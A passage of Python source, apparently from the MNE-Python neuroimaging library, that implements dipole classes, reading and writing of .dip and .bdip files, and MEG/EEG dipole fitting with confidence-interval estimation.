plot the dipole with the highest amplitude. The dipoles can also be
browsed through using up/down arrow keys or mouse scroll. Defaults
to 'gof'. Only used if mode equals 'orthoview'.
.. versionadded:: 0.14.0
show_all : bool
Whether to always plot all the dipoles. If True (default), the
            active dipole is plotted as a red dot and its location determines
            the shown MRI slices. The non-active dipoles are plotted as
small blue dots. If False, only the active dipole is plotted.
Only used if mode equals 'orthoview'.
.. versionadded:: 0.14.0
ax : instance of matplotlib Axes3D | None
Axes to plot into. If None (default), axes will be created.
Only used if mode equals 'orthoview'.
.. versionadded:: 0.14.0
block : bool
Whether to halt program execution until the figure is closed.
Defaults to False. Only used if mode equals 'orthoview'.
.. versionadded:: 0.14.0
show : bool
Show figure if True. Defaults to True.
Only used if mode equals 'orthoview'.
scale : float
The scale of the dipoles if ``mode`` is 'arrow' or 'sphere'.
color : tuple
The color of the dipoles if ``mode`` is 'arrow' or 'sphere'.
fig : mayavi.mlab.Figure | None
Mayavi Scene in which to plot the alignment.
If ``None``, creates a new 600x600 pixel figure with black
background.
.. versionadded:: 0.14.0
%(verbose_meth)s
%(dipole_locs_fig_title)s
.. versionadded:: 0.21.0
Returns
-------
fig : instance of mayavi.mlab.Figure or matplotlib.figure.Figure
The mayavi figure or matplotlib Figure.
Notes
-----
.. versionadded:: 0.9.0
"""
_check_option('mode', mode, [None, 'arrow', 'sphere', 'orthoview'])
from .viz import plot_dipole_locations
return plot_dipole_locations(
self, trans, subject, subjects_dir, mode, coord_frame, idx,
show_all, ax, block, show, scale=scale, color=color, fig=fig,
title=title)
@verbose
def to_mni(self, subject, trans, subjects_dir=None,
verbose=None):
"""Convert dipole location from head coordinate system to MNI coordinates.
Parameters
----------
%(subject)s
%(trans_not_none)s
%(subjects_dir)s
%(verbose)s
Returns
-------
pos_mni : array, shape (n_pos, 3)
The MNI coordinates (in mm) of pos.
"""
mri_head_t, trans = _get_trans(trans)
return head_to_mni(self.pos, subject, mri_head_t,
subjects_dir=subjects_dir, verbose=verbose)
def plot_amplitudes(self, color='k', show=True):
"""Plot the dipole amplitudes as a function of time.
Parameters
----------
color : matplotlib color
Color to use for the trace.
show : bool
Show figure if True.
Returns
-------
fig : matplotlib.figure.Figure
The figure object containing the plot.
"""
from .viz import plot_dipole_amplitudes
return plot_dipole_amplitudes([self], [color], show)
def __getitem__(self, item):
"""Get a time slice.
Parameters
----------
item : array-like or slice
The slice of time points to use.
Returns
-------
dip : instance of Dipole
The sliced dipole.
"""
if isinstance(item, int): # make sure attributes stay 2d
item = [item]
selected_times = self.times[item].copy()
selected_pos = self.pos[item, :].copy()
selected_amplitude = self.amplitude[item].copy()
selected_ori = self.ori[item, :].copy()
selected_gof = self.gof[item].copy()
selected_name = self.name
selected_conf = dict()
for key in self.conf.keys():
selected_conf[key] = self.conf[key][item]
selected_khi2 = self.khi2[item] if self.khi2 is not None else None
selected_nfree = self.nfree[item] if self.nfree is not None else None
return Dipole(
selected_times, selected_pos, selected_amplitude, selected_ori,
selected_gof, selected_name, selected_conf, selected_khi2,
selected_nfree)
def __len__(self):
"""Return the number of dipoles.
Returns
-------
len : int
The number of dipoles.
Examples
--------
This can be used as::
>>> len(dipoles) # doctest: +SKIP
10
"""
return self.pos.shape[0]
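# Usage sketch (illustrative only): a Dipole is normally obtained from
# read_dipole() or fit_dipole(); direct construction simply mirrors the
# docstring above, and indexing/cropping operate along the time axis.
#
#   import numpy as np
#   dip = Dipole(times=[0.1, 0.2], pos=np.zeros((2, 3)),
#                amplitude=[10e-9, 20e-9],
#                ori=[[1., 0., 0.], [0., 1., 0.]], gof=[80., 90.])
#   dip[0]               # single-fit slice
#   dip.crop(tmin=0.15)  # keep only the later fit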
def _read_dipole_fixed(fname):
"""Read a fixed dipole FIF file."""
logger.info('Reading %s ...' % fname)
info, nave, aspect_kind, comment, times, data, _ = _read_evoked(fname)
return DipoleFixed(info, data, times, nave, aspect_kind, comment=comment)
@fill_doc
class DipoleFixed(ShiftTimeMixin):
"""Dipole class for fixed-position dipole fits.
.. note:: This class should usually not be instantiated directly,
instead :func:`mne.read_dipole` should be used.
Parameters
----------
info : instance of Info
The measurement info.
data : array, shape (n_channels, n_times)
The dipole data.
times : array, shape (n_times,)
The time points.
nave : int
Number of averages.
aspect_kind : int
The kind of data.
comment : str
The dipole comment.
%(verbose)s
See Also
--------
read_dipole
Dipole
fit_dipole
Notes
-----
This class is for fixed-position dipole fits, where the position
(and maybe orientation) is static over time. For sequential dipole fits,
    where the position can change as a function of time, use :class:`mne.Dipole`.
.. versionadded:: 0.12
"""
@verbose
def __init__(self, info, data, times, nave, aspect_kind,
comment='', verbose=None): # noqa: D102
self.info = info
self.nave = nave
self._aspect_kind = aspect_kind
self.kind = _aspect_rev.get(aspect_kind, 'unknown')
self.comment = comment
self.times = times
self.data = data
self.verbose = verbose
self.preload = True
self._update_first_last()
def __repr__(self): # noqa: D105
s = "n_times : %s" % len(self.times)
s += ", tmin : %s" % np.min(self.times)
s += ", tmax : %s" % np.max(self.times)
return "<DipoleFixed | %s>" % s
def copy(self):
"""Copy the DipoleFixed object.
Returns
-------
inst : instance of DipoleFixed
The copy.
Notes
-----
.. versionadded:: 0.16
"""
return deepcopy(self)
@property
def ch_names(self):
"""Channel names."""
return self.info['ch_names']
@verbose
def save(self, fname, verbose=None):
"""Save dipole in a .fif file.
Parameters
----------
fname : str
The name of the .fif file. Must end with ``'.fif'`` or
``'.fif.gz'`` to make it explicit that the file contains
dipole information in FIF format.
%(verbose_meth)s
"""
check_fname(fname, 'DipoleFixed', ('-dip.fif', '-dip.fif.gz',
'_dip.fif', '_dip.fif.gz',),
('.fif', '.fif.gz'))
_write_evokeds(fname, self, check=False)
def plot(self, show=True, time_unit='s'):
"""Plot dipole data.
Parameters
----------
show : bool
Call pyplot.show() at the end or not.
time_unit : str
The units for the time axis, can be "ms" or "s" (default).
.. versionadded:: 0.16
Returns
-------
fig : instance of matplotlib.figure.Figure
The figure containing the time courses.
"""
return _plot_evoked(self, picks=None, exclude=(), unit=True, show=show,
ylim=None, xlim='tight', proj=False, hline=None,
units=None, scalings=None, titles=None, axes=None,
gfp=False, window_title=None, spatial_colors=False,
plot_type="butterfly", selectable=False,
time_unit=time_unit)
# #############################################################################
# IO
@verbose
def read_dipole(fname, verbose=None):
"""Read .dip file from Neuromag/xfit or MNE.
Parameters
----------
fname : str
The name of the .dip or .fif file.
%(verbose)s
Returns
-------
dipole : instance of Dipole or DipoleFixed
The dipole.
See Also
--------
Dipole
DipoleFixed
fit_dipole
Notes
-----
.. versionchanged:: 0.20
Support for reading bdip (Xfit binary) format.
"""
fname = _check_fname(fname, overwrite='read', must_exist=True)
if fname.endswith('.fif') or fname.endswith('.fif.gz'):
return _read_dipole_fixed(fname)
elif fname.endswith('.bdip'):
return _read_dipole_bdip(fname)
else:
return _read_dipole_text(fname)
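# Dispatch summary: '.fif'/'.fif.gz' files return a DipoleFixed, '.bdip' files
# use the binary Xfit reader, and anything else is parsed as a .dip text file,
# e.g. (file name illustrative only):
#
#   dip = read_dipole('sample_set1.dip')   # -> Dipole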
def _read_dipole_text(fname):
"""Read a dipole text file."""
# Figure out the special fields
need_header = True
def_line = name = None
# There is a bug in older np.loadtxt regarding skipping fields,
# so just read the data ourselves (need to get name and header anyway)
data = list()
with open(fname, 'r') as fid:
for line in fid:
if not (line.startswith('%') or line.startswith('#')):
need_header = False
data.append(line.strip().split())
else:
if need_header:
def_line = line
if line.startswith('##') or line.startswith('%%'):
m = re.search('Name "(.*) dipoles"', line)
if m:
name = m.group(1)
del line
data = np.atleast_2d(np.array(data, float))
if def_line is None:
raise IOError('Dipole text file is missing field definition '
'comment, cannot parse %s' % (fname,))
# actually parse the fields
def_line = def_line.lstrip('%').lstrip('#').strip()
# MNE writes it out differently than Elekta, let's standardize them...
fields = re.sub(r'([X|Y|Z] )\(mm\)', # "X (mm)", etc.
lambda match: match.group(1).strip() + '/mm', def_line)
fields = re.sub(r'\((.*?)\)', # "Q(nAm)", etc.
lambda match: '/' + match.group(1), fields)
fields = re.sub('(begin|end) ', # "begin" and "end" with no units
lambda match: match.group(1) + '/ms', fields)
fields = fields.lower().split()
required_fields = ('begin/ms',
'x/mm', 'y/mm', 'z/mm',
'q/nam', 'qx/nam', 'qy/nam', 'qz/nam',
'g/%')
optional_fields = ('khi^2', 'free', # standard ones
# now the confidence fields (up to 5!)
'vol/mm^3', 'depth/mm', 'long/mm', 'trans/mm',
'qlong/nam', 'qtrans/nam')
conf_scales = [1e-9, 1e-3, 1e-3, 1e-3, 1e-9, 1e-9]
missing_fields = sorted(set(required_fields) - set(fields))
if len(missing_fields) > 0:
raise RuntimeError('Could not find necessary fields in header: %s'
% (missing_fields,))
handled_fields = set(required_fields) | set(optional_fields)
assert len(handled_fields) == len(required_fields) + len(optional_fields)
ignored_fields = sorted(set(fields) -
set(handled_fields) -
{'end/ms'})
if len(ignored_fields) > 0:
warn('Ignoring extra fields in dipole file: %s' % (ignored_fields,))
if len(fields) != data.shape[1]:
raise IOError('More data fields (%s) found than data columns (%s): %s'
% (len(fields), data.shape[1], fields))
logger.info("%d dipole(s) found" % len(data))
if 'end/ms' in fields:
if np.diff(data[:, [fields.index('begin/ms'),
fields.index('end/ms')]], 1, -1).any():
warn('begin and end fields differed, but only begin will be used '
'to store time values')
# Find the correct column in our data array, then scale to proper units
idx = [fields.index(field) for field in required_fields]
assert len(idx) >= 9
times = data[:, idx[0]] / 1000.
pos = 1e-3 * data[:, idx[1:4]] # put data in meters
amplitude = data[:, idx[4]]
norm = amplitude.copy()
amplitude /= 1e9
norm[norm == 0] = 1
ori = data[:, idx[5:8]] / norm[:, np.newaxis]
gof = data[:, idx[8]]
# Deal with optional fields
optional = [None] * 2
for fi, field in enumerate(optional_fields[:2]):
if field in fields:
optional[fi] = data[:, fields.index(field)]
khi2, nfree = optional
conf = dict()
for field, scale in zip(optional_fields[2:], conf_scales): # confidence
if field in fields:
conf[field.split('/')[0]] = scale * data[:, fields.index(field)]
return Dipole(times, pos, amplitude, ori, gof, name, conf, khi2, nfree)
def _write_dipole_text(fname, dip):
fmt = ' %7.1f %7.1f %8.2f %8.2f %8.2f %8.3f %8.3f %8.3f %8.3f %6.2f'
header = ('# begin end X (mm) Y (mm) Z (mm)'
' Q(nAm) Qx(nAm) Qy(nAm) Qz(nAm) g/%')
t = dip.times[:, np.newaxis] * 1000.
gof = dip.gof[:, np.newaxis]
amp = 1e9 * dip.amplitude[:, np.newaxis]
out = (t, t, dip.pos / 1e-3, amp, dip.ori * amp, gof)
# optional fields
fmts = dict(khi2=(' khi^2', ' %8.1f', 1.),
nfree=(' free', ' %5d', 1),
vol=(' vol/mm^3', ' %9.3f', 1e9),
depth=(' depth/mm', ' %9.3f', 1e3),
long=(' long/mm', ' %8.3f', 1e3),
trans=(' trans/mm', ' %9.3f', 1e3),
qlong=(' Qlong/nAm', ' %10.3f', 1e9),
qtrans=(' Qtrans/nAm', ' %11.3f', 1e9),
)
for key in ('khi2', 'nfree'):
data = getattr(dip, key)
if data is not None:
header += fmts[key][0]
fmt += fmts[key][1]
out += (data[:, np.newaxis] * fmts[key][2],)
for key in ('vol', 'depth', 'long', 'trans', 'qlong', 'qtrans'):
data = dip.conf.get(key)
if data is not None:
header += fmts[key][0]
fmt += fmts[key][1]
out += (data[:, np.newaxis] * fmts[key][2],)
out = np.concatenate(out, axis=-1)
# NB CoordinateSystem is hard-coded as Head here
with open(fname, 'wb') as fid:
fid.write('# CoordinateSystem "Head"\n'.encode('utf-8'))
fid.write((header + '\n').encode('utf-8'))
np.savetxt(fid, out, fmt=fmt)
if dip.name is not None:
fid.write(('## Name "%s dipoles" Style "Dipoles"'
% dip.name).encode('utf-8'))
_BDIP_ERROR_KEYS = ('depth', 'long', 'trans', 'qlong', 'qtrans')
def _read_dipole_bdip(fname):
name = None
nfree = None
with open(fname, 'rb') as fid:
# Which dipole in a multi-dipole set
times = list()
pos = list()
amplitude = list()
ori = list()
gof = list()
conf = dict(vol=list())
khi2 = list()
has_errors = None
while True:
num = np.frombuffer(fid.read(4), '>i4')
if len(num) == 0:
break
times.append(np.frombuffer(fid.read(4), '>f4')[0])
fid.read(4) # end
fid.read(12) # r0
pos.append(np.frombuffer(fid.read(12), '>f4'))
Q = np.frombuffer(fid.read(12), '>f4')
amplitude.append(np.linalg.norm(Q))
ori.append(Q / amplitude[-1])
gof.append(100 * np.frombuffer(fid.read(4), '>f4')[0])
this_has_errors = bool(np.frombuffer(fid.read(4), '>i4')[0])
if has_errors is None:
has_errors = this_has_errors
for key in _BDIP_ERROR_KEYS:
conf[key] = list()
assert has_errors == this_has_errors
fid.read(4) # Noise level used for error computations
limits = np.frombuffer(fid.read(20), '>f4') # error limits
for key, lim in zip(_BDIP_ERROR_KEYS, limits):
conf[key].append(lim)
fid.read(100) # (5, 5) fully describes the conf. ellipsoid
conf['vol'].append(np.frombuffer(fid.read(4), '>f4')[0])
khi2.append(np.frombuffer(fid.read(4), '>f4')[0])
fid.read(4) # prob
fid.read(4) # total noise estimate
return Dipole(times, pos, amplitude, ori, gof, name, conf, khi2, nfree)
def _write_dipole_bdip(fname, dip):
with open(fname, 'wb+') as fid:
for ti, t in enumerate(dip.times):
fid.write(np.zeros(1, '>i4').tobytes()) # int dipole
fid.write(np.array([t, 0]).astype('>f4').tobytes())
fid.write(np.zeros(3, '>f4').tobytes()) # r0
fid.write(dip.pos[ti].astype('>f4').tobytes()) # pos
Q = dip.amplitude[ti] * dip.ori[ti]
fid.write(Q.astype('>f4').tobytes())
fid.write(np.array(dip.gof[ti] / 100., '>f4').tobytes())
has_errors = int(bool(len(dip.conf)))
fid.write(np.array(has_errors, '>i4').tobytes()) # has_errors
fid.write(np.zeros(1, '>f4').tobytes()) # noise level
for key in _BDIP_ERROR_KEYS:
val = dip.conf[key][ti] if key in dip.conf else 0.
assert val.shape == ()
fid.write(np.array(val, '>f4').tobytes())
fid.write(np.zeros(25, '>f4').tobytes())
conf = dip.conf['vol'][ti] if 'vol' in dip.conf else 0.
fid.write(np.array(conf, '>f4').tobytes())
khi2 = dip.khi2[ti] if dip.khi2 is not None else 0
fid.write(np.array(khi2, '>f4').tobytes())
fid.write(np.zeros(1, '>f4').tobytes()) # prob
fid.write(np.zeros(1, '>f4').tobytes()) # total noise est
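# For reference, each bdip record written above (and consumed by
# _read_dipole_bdip) is a fixed-size big-endian block: dipole index (int32),
# begin/end times (2 x float32), r0 and position (each 3 x float32),
# Q (3 x float32), goodness of fit, has_errors flag (int32), noise level,
# five error limits, a 5 x 5 confidence matrix, volume, khi^2, probability,
# and the total noise estimate (all float32 unless noted).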
# #############################################################################
# Fitting
def _dipole_forwards(fwd_data, whitener, rr, n_jobs=1):
"""Compute the forward solution and do other nice stuff."""
B = _compute_forwards_meeg(rr, fwd_data, n_jobs, silent=True)
B = np.concatenate(B, axis=1)
assert np.isfinite(B).all()
B_orig = B.copy()
# Apply projection and whiten (cov has projections already)
_, _, dgemm = _get_ddot_dgemv_dgemm()
B = dgemm(1., B, whitener.T)
# column normalization doesn't affect our fitting, so skip for now
# S = np.sum(B * B, axis=1) # across channels
# scales = np.repeat(3. / np.sqrt(np.sum(np.reshape(S, (len(rr), 3)),
# axis=1)), 3)
# B *= scales[:, np.newaxis]
scales = np.ones(3)
return B, B_orig, scales
@verbose
def _make_guesses(surf, grid, exclude, mindist, n_jobs=1, verbose=None):
"""Make a guess space inside a sphere or BEM surface."""
if 'rr' in surf:
logger.info('Guess surface (%s) is in %s coordinates'
% (_bem_surf_name[surf['id']],
_coord_frame_name(surf['coord_frame'])))
else:
logger.info('Making a spherical guess space with radius %7.1f mm...'
% (1000 * surf['R']))
logger.info('Filtering (grid = %6.f mm)...' % (1000 * grid))
src = _make_volume_source_space(surf, grid, exclude, 1000 * mindist,
do_neighbors=False, n_jobs=n_jobs)[0]
assert 'vertno' in src
# simplify the result to make things easier later
src = dict(rr=src['rr'][src['vertno']], nn=src['nn'][src['vertno']],
nuse=src['nuse'], coord_frame=src['coord_frame'],
vertno=np.arange(src['nuse']), type='discrete')
return SourceSpaces([src])
def _fit_eval(rd, B, B2, fwd_svd=None, fwd_data=None, whitener=None,
lwork=None):
"""Calculate the residual sum of squares."""
if fwd_svd is None:
fwd = _dipole_forwards(fwd_data, whitener, rd[np.newaxis, :])[0]
uu, sing, vv = _repeated_svd(fwd, lwork, overwrite_a=True)
else:
uu, sing, vv = fwd_svd
gof = _dipole_gof(uu, sing, vv, B, B2)[0]
# mne-c uses fitness=B2-Bm2, but ours (1-gof) is just a normalized version
return 1. - gof
@functools.lru_cache(None)
def _get_ddot_dgemv_dgemm():
return _get_blas_funcs(np.float64, ('dot', 'gemv', 'gemm'))
def _dipole_gof(uu, sing, vv, B, B2):
"""Calculate the goodness of fit from the forward SVD."""
ddot, dgemv, _ = _get_ddot_dgemv_dgemm()
ncomp = 3 if sing[2] / (sing[0] if sing[0] > 0 else 1.) > 0.2 else 2
one = dgemv(1., vv[:ncomp], B) # np.dot(vv[:ncomp], B)
Bm2 = ddot(one, one) # np.sum(one * one)
gof = Bm2 / B2
return gof, one
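# In symbols: uu, sing, vv is the SVD of the whitened forward fields of the
# three dipole components at the candidate location, and B is the whitened
# data. The returned gof is ||vv[:ncomp] @ B||**2 / ||B||**2, i.e. the
# fraction of (whitened) data power lying in the ncomp-dimensional subspace
# spanned by those field patterns.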
def _fit_Q(fwd_data, whitener, B, B2, B_orig, rd, ori=None):
"""Fit the dipole moment once the location is known."""
from scipy import linalg
if 'fwd' in fwd_data:
# should be a single precomputed "guess" (i.e., fixed position)
assert rd is None
fwd = fwd_data['fwd']
assert fwd.shape[0] == 3
fwd_orig = fwd_data['fwd_orig']
assert fwd_orig.shape[0] == 3
scales = fwd_data['scales']
assert scales.shape == (3,)
fwd_svd = fwd_data['fwd_svd'][0]
else:
fwd, fwd_orig, scales = _dipole_forwards(fwd_data, whitener,
rd[np.newaxis, :])
fwd_svd = None
if ori is None:
if fwd_svd is None:
fwd_svd = linalg.svd(fwd, full_matrices=False)
uu, sing, vv = fwd_svd
gof, one = _dipole_gof(uu, sing, vv, B, B2)
ncomp = len(one)
one /= sing[:ncomp]
Q = np.dot(one, uu.T[:ncomp])
else:
fwd = np.dot(ori[np.newaxis], fwd)
sing = np.linalg.norm(fwd)
one = np.dot(fwd / sing, B)
gof = (one * one)[0] / B2
Q = ori * np.sum(one / sing)
ncomp = 3
# Counteract the effect of column normalization
Q *= scales[0]
B_residual_noproj = B_orig - np.dot(fwd_orig.T, Q)
return Q, gof, B_residual_noproj, ncomp
def _fit_dipoles(fun, min_dist_to_inner_skull, data, times, guess_rrs,
guess_data, fwd_data, whitener, ori, n_jobs, rank):
"""Fit a single dipole to the given whitened, projected data."""
from scipy.optimize import fmin_cobyla
parallel, p_fun, _ = parallel_func(fun, n_jobs)
# parallel over time points
res = parallel(p_fun(min_dist_to_inner_skull, B, t, guess_rrs,
guess_data, fwd_data, whitener,
fmin_cobyla, ori, rank)
for B, t in zip(data.T, times))
pos = np.array([r[0] for r in res])
amp = np.array([r[1] for r in res])
ori = np.array([r[2] for r in res])
gof = np.array([r[3] for r in res]) * 100 # convert to percentage
conf = None
if res[0][4] is not None:
conf = np.array([r[4] for r in res])
keys = ['vol', 'depth', 'long', 'trans', 'qlong', 'qtrans']
conf = {key: conf[:, ki] for ki, key in enumerate(keys)}
khi2 = np.array([r[5] for r in res])
nfree = np.array([r[6] for r in res])
residual_noproj = np.array([r[7] for r in res]).T
return pos, amp, ori, gof, conf, khi2, nfree, residual_noproj
'''Simplex code in case we ever want/need it for testing
def _make_tetra_simplex():
"""Make the initial tetrahedron"""
#
# For this definition of a regular tetrahedron, see
#
# http://mathworld.wolfram.com/Tetrahedron.html
#
x = np.sqrt(3.0) / 3.0
r = np.sqrt(6.0) / 12.0
R = 3 * r
d = x / 2.0
simplex = 1e-2 * np.array([[x, 0.0, -r],
[-d, 0.5, -r],
[-d, -0.5, -r],
[0., 0., R]])
return simplex
def try_(p, y, psum, ndim, fun, ihi, neval, fac):
"""Helper to try a value"""
ptry = np.empty(ndim)
fac1 = (1.0 - fac) / ndim
fac2 = fac1 - fac
ptry = psum * fac1 - p[ihi] * fac2
ytry = fun(ptry)
neval += 1
if ytry < y[ihi]:
y[ihi] = ytry
psum[:] += ptry - p[ihi]
p[ihi] = ptry
return ytry, neval
def _simplex_minimize(p, ftol, stol, fun, max_eval=1000):
"""Minimization with the simplex algorithm
Modified from Numerical recipes"""
y = np.array([fun(s) for s in p])
ndim = p.shape[1]
assert p.shape[0] == ndim + 1
mpts = ndim + 1
neval = 0
psum = p.sum(axis=0)
loop = 1
while(True):
ilo = 1
if y[1] > y[2]:
ihi = 1
inhi = 2
else:
ihi = 2
inhi = 1
for i in range(mpts):
if y[i] < y[ilo]:
ilo = i
if y[i] > y[ihi]:
inhi = ihi
ihi = i
elif y[i] > y[inhi]:
if i != ihi:
inhi = i
rtol = 2 * np.abs(y[ihi] - y[ilo]) / (np.abs(y[ihi]) + np.abs(y[ilo]))
if rtol < ftol:
break
if neval >= max_eval:
raise RuntimeError('Maximum number of evaluations exceeded.')
if stol > 0: # Has the simplex collapsed?
dsum = np.sqrt(np.sum((p[ilo] - p[ihi]) ** 2))
if loop > 5 and dsum < stol:
break
ytry, neval = try_(p, y, psum, ndim, fun, ihi, neval, -1.)
if ytry <= y[ilo]:
ytry, neval = try_(p, y, psum, ndim, fun, ihi, neval, 2.)
elif ytry >= y[inhi]:
ysave = y[ihi]
ytry, neval = try_(p, y, psum, ndim, fun, ihi, neval, 0.5)
if ytry >= ysave:
for i in range(mpts):
if i != ilo:
psum[:] = 0.5 * (p[i] + p[ilo])
p[i] = psum
y[i] = fun(psum)
neval += ndim
psum = p.sum(axis=0)
loop += 1
'''
def _fit_confidence(rd, Q, ori, whitener, fwd_data):
    # As described in the Xfit manual, confidence intervals can be calculated
    # by examining a linearization of the model at the best-fitting location,
# i.e. taking the Jacobian and using the whitener:
#
# J = [∂b/∂x ∂b/∂y ∂b/∂z ∂b/∂Qx ∂b/∂Qy ∂b/∂Qz]
# C = (J.T C^-1 J)^-1
#
# And then the confidence interval is the diagonal of C, scaled by 1.96
# (for 95% confidence).
from scipy import linalg
direction = np.empty((3, 3))
# The coordinate system has the x axis aligned with the dipole orientation,
direction[0] = ori
# the z axis through the origin of the sphere model
rvec = rd - fwd_data['inner_skull']['r0']
direction[2] = rvec - ori * np.dot(ori, rvec) # orthogonalize
direction[2] /= np.linalg.norm(direction[2])
    # and the y axis perpendicular to these, forming a right-handed system.
direction[1] = np.cross(direction[2], direction[0])
assert np.allclose(np.dot(direction, direction.T), np.eye(3))
# Get spatial deltas in dipole coordinate directions
deltas = (-1e-4, 1e-4)
J = np.empty((whitener.shape[0], 6))
for ii in range(3):
fwds = []
for delta in deltas:
this_r = rd[np.newaxis] + delta * direction[ii]
fwds.append(
np.dot(Q, _dipole_forwards(fwd_data, whitener, this_r)[0]))
J[:, ii] = np.diff(fwds, axis=0)[0] / np.diff(deltas)[0]
# Get current (Q) deltas in the dipole directions
deltas = np.array([-0.01, 0.01]) * np.linalg.norm(Q)
this_fwd = _dipole_forwards(fwd_data, whitener, rd[np.newaxis])[0]
for ii in range(3):
fwds = []
for delta in deltas:
fwds.append(np.dot(Q + delta * direction[ii], this_fwd))
J[:, ii + 3] = np.diff(fwds, axis=0)[0] / np.diff(deltas)[0]
# J is already whitened, so we don't need to do np.dot(whitener, J).
# However, the units in the Jacobian are potentially quite different,
# so we need to do some normalization during inversion, then revert.
direction_norm = np.linalg.norm(J[:, :3])
Q_norm = np.linalg.norm(J[:, 3:5]) # omit possible zero Z
norm = np.array([direction_norm] * 3 + [Q_norm] * 3)
J /= norm
J = np.dot(J.T, J)
C = linalg.pinvh(J, rcond=1e-14)
C /= norm
C /= norm[:, np.newaxis]
conf = 1.96 * np.sqrt(np.diag(C))
    # The confidence volume of the dipole location is obtained by
# taking the eigenvalues of the upper left submatrix and computing
# v = 4π/3 √(c^3 λ1 λ2 λ3) with c = 7.81, or:
vol_conf = 4 * np.pi / 3. * np.sqrt(
476.379541 * np.prod(linalg.eigh(C[:3, :3], eigvals_only=True)))
conf = np.concatenate([conf, [vol_conf]])
# Now we reorder and subselect the proper columns:
# vol, depth, long, trans, Qlong, Qtrans (discard Qdepth, assumed zero)
conf = conf[[6, 2, 0, 1, 3, 4]]
return conf
def _surface_constraint(rd, surf, min_dist_to_inner_skull):
"""Surface fitting constraint."""
dist = _compute_nearest(surf['rr'], rd[np.newaxis, :],
return_dists=True)[1][0]
if _points_outside_surface(rd[np.newaxis, :], surf, 1)[0]:
dist *= -1.
# Once we know the dipole is below the inner skull,
# let's check if its distance to the inner skull is at least
# min_dist_to_inner_skull. This can be enforced by adding a
    # constraint proportional to its distance.
dist -= min_dist_to_inner_skull
return dist
def _sphere_constraint(rd, r0, R_adj):
"""Sphere fitting constraint."""
return R_adj - np.sqrt(np.sum((rd - r0) ** 2))
def _fit_dipole(min_dist_to_inner_skull, B_orig, t, guess_rrs,
guess_data, fwd_data, whitener, fmin_cobyla, ori, rank):
"""Fit a single bit of data."""
B = np.dot(whitener, B_orig)
# make constraint function to keep the solver within the inner skull
if 'rr' in fwd_data['inner_skull']: # bem
surf = fwd_data['inner_skull']
constraint = partial(_surface_constraint, surf=surf,
min_dist_to_inner_skull=min_dist_to_inner_skull)
else: # sphere
surf = None
constraint = partial(
_sphere_constraint, r0=fwd_data['inner_skull']['r0'],
R_adj=fwd_data['inner_skull']['R'] - min_dist_to_inner_skull)
# Find a good starting point (find_best_guess in C)
B2 = np.dot(B, B)
if B2 == 0:
warn('Zero field found for time %s' % t)
return np.zeros(3), 0, np.zeros(3), 0, B
idx = np.argmin([_fit_eval(guess_rrs[[fi], :], B, B2, fwd_svd)
for fi, fwd_svd in enumerate(guess_data['fwd_svd'])])
x0 = guess_rrs[idx]
lwork = _svd_lwork((3, B.shape[0]))
fun = partial(_fit_eval, B=B, B2=B2, fwd_data=fwd_data, whitener=whitener,
lwork=lwork)
# Tested minimizers:
# Simplex, BFGS, CG, COBYLA, L-BFGS-B, Powell, SLSQP, TNC
# Several were similar, but COBYLA won for having a handy constraint
# function we can use to ensure we stay inside the inner skull /
# smallest sphere
rd_final = fmin_cobyla(fun, x0, (constraint,), consargs=(),
rhobeg=5e-2, rhoend=5e-5, disp=False)
# simplex = _make_tetra_simplex() + x0
# _simplex_minimize(simplex, 1e-4, 2e-4, fun)
# rd_final = simplex[0]
# Compute the dipole moment at the final point
Q, gof, residual_noproj, n_comp = _fit_Q(
fwd_data, whitener, B, B2, B_orig, rd_final, ori=ori)
khi2 = (1 - gof) * B2
nfree = rank - n_comp
amp = np.sqrt(np.dot(Q, Q))
norm = 1. if amp == 0. else amp
ori = Q / norm
conf = _fit_confidence(rd_final, Q, ori, whitener, fwd_data)
msg = '---- Fitted : %7.1f ms' % (1000. * t)
if surf is not None:
dist_to_inner_skull = _compute_nearest(
surf['rr'], rd_final[np.newaxis, :], return_dists=True)[1][0]
msg += (", distance to inner skull : %2.4f mm"
% (dist_to_inner_skull * 1000.))
logger.info(msg)
return rd_final, amp, ori, gof, conf, khi2, nfree, residual_noproj
def _fit_dipole_fixed(min_dist_to_inner_skull, B_orig, t, guess_rrs,
guess_data, fwd_data, whitener,
fmin_cobyla, ori, rank):
"""Fit a data using a fixed position."""
B = np.dot(whitener, B_orig)
B2 = np.dot(B, B)
if B2 == 0:
warn('Zero field found for time %s' % t)
return np.zeros(3), 0, np.zeros(3), 0, np.zeros(6)
# Compute the dipole moment
Q, gof, residual_noproj = _fit_Q(guess_data, whitener, B, B2, B_orig,
rd=None, ori=ori)[:3]
if ori is None:
amp = np.sqrt(np.dot(Q, Q))
norm = 1. if amp == 0. else amp
ori = Q / norm
else:
amp = np.dot(Q, ori)
rd_final = guess_rrs[0]
# This will be slow, and we don't use it anyway, so omit it for now:
# conf = _fit_confidence(rd_final, Q, ori, whitener, fwd_data)
conf = khi2 = nfree = None
# No corresponding 'logger' message here because it should go *very* fast
return rd_final, amp, ori, gof, conf, khi2, nfree, residual_noproj
@verbose
def fit_dipole(evoked, cov, bem, trans=None, min_dist=5., n_jobs=1,
pos=None, ori=None, rank=None, verbose=None):
"""Fit a dipole.
Parameters
----------
evoked : instance of Evoked
The dataset to fit.
cov : str | instance of Covariance
The noise covariance.
bem : str | instance of ConductorModel
The BEM filename (str) or conductor model.
trans : str | None
The head<->MRI transform filename. Must be provided unless BEM
is a sphere model.
min_dist : float
Minimum distance (in millimeters) from the dipole to the inner skull.
Must be positive. Note that because this is a constraint passed to
a solver it is not strict but close, i.e. for a ``min_dist=5.`` the
fits could be 4.9 mm from the inner skull.
%(n_jobs)s
It is used in field computation and fitting.
pos : ndarray, shape (3,) | None
Position of the dipole to use. If None (default), sequential
fitting (different position and orientation for each time instance)
is performed. If a position (in head coords) is given as an array,
the position is fixed during fitting.
.. versionadded:: 0.12
ori : ndarray, shape (3,) | None
Orientation of the dipole to use. If None (default), the
orientation is free to change as a function of time. If an
orientation (in head coordinates) is given as an array, ``pos``
must also be provided, and the routine computes the amplitude and
goodness of fit of the dipole at the given position and orientation
for each time instant.
.. versionadded:: 0.12
%(rank_None)s
.. versionadded:: 0.20
%(verbose)s
Returns
-------
dip : instance of Dipole or DipoleFixed
The dipole fits. A :class:`mne.DipoleFixed` is returned if
``pos`` and ``ori`` are both not None, otherwise a
:class:`mne.Dipole` is returned.
residual : instance of Evoked
The M-EEG data channels with the fitted dipolar activity removed.
See Also
--------
mne.beamformer.rap_music
Dipole
DipoleFixed
read_dipole
Notes
-----
.. versionadded:: 0.9.0
"""
from scipy import linalg
# This could eventually be adapted to work with other inputs, these
